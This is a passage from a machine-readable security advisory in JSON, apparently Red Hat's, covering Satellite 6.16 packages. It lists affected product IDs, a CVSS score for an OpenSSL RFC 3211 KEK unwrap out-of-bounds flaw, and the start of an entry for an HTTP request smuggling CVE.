"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "openssl: Out-of-bounds read \u0026 write in RFC 3211 KEK Unwrap"
},
{
"cve": "CVE-2026-2332",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"discovery_date": "2026-04-14T12:01:05.768902+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
